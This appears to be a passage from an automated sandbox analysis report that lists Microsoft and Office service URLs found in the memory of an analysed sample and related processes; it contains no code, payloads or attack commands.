    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678240491.00000248C314B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1677812892.00000248C3123000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EB2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
    Source: 872C.tmp, 00000003.00000003.1430249735.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394240204.0000000003F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizealing
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EB2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedl2
    Source: 872C.tmp, 00000003.00000003.1431577067.0000000003EB2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395078467.0000000003E97000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedy
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057273625.00000248C0D08000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://make.powerautomate.com
    Source: 872C.tmp, 00000003.00000003.1395251376.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com
    Source: 872C.tmp, 00000003.00000003.1393977781.0000000005561000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/Ge
    Source: 872C.tmp, 00000003.00000003.1395251376.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1707272287.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013229601.00000248C2D61000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://management.core.windows.net/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053756999.00000248C3242000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2043083138.00000248C3232000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2041372305.00000248C3212000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messaging.action.office.com/setcampaignaction
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430663111.0000000003E62000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394605340.0000000003E75000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394341544.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messaging.engagement.office.com/
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16ails
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16dLoop
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16l~
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.000000000576E000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392714396.0000000005725000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060999948.00000248C3221000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2041372305.00000248C3212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messaging.office.com/
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messaging.office.com/airtrafficcontrol/governancerulesles
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messaging.office.com/lifecycle/SendAutoRenewActionion
    Source: 872C.tmp, 00000003.00000003.1430249735.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429775033.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430152859.0000000001D42000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430663111.0000000003E62000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2057273625.00000248C0D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/apihttps://mrodevicemgr.edog.officeapps.liv
    Source: 872C.tmp, 00000003.00000003.1393216623.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CCF000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/apiy
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430359257.0000000005666000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392259764.00000000056A2000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2053127939.00000248C31E1000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015894412.00000248C31DA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://my.microsoftpersonalcontent.com
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394188424.0000000005646000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005636000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392489428.0000000005645000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393427760.0000000005645000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ncus.contentsync.
    Source: 872C.tmp, 00000003.00000003.1430039742.0000000003F71000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394736534.0000000003F77000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394452880.0000000003F70000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394302183.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ncus.contentsync.onenote.com/contentsync/v1
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nexus.officeapps.live.comDict_E2C.PNG
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nexusrules.officeapps.live.comX
    Source: 872C.tmp, 00000002.00000000.1320044762.000000000142B000.00000002.00000001.01000000.00000005.sdmp, 872C.tmp, 00000003.00000000.1321361371.000000000142B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.comPo
    Source: sBvrNv0wtb.exe, 00000000.00000003.1320415962.0000019728184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.comPoe
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nleditor.osi.office.net/NlEditor/CloudSuggest/V1/V1aQ
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nleditor.osi.office.net/NlEditor/Instrumentation/V1/V1
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nleditor.osi.office.net/NlEditor/LanguageInfo/V1/V1assVM
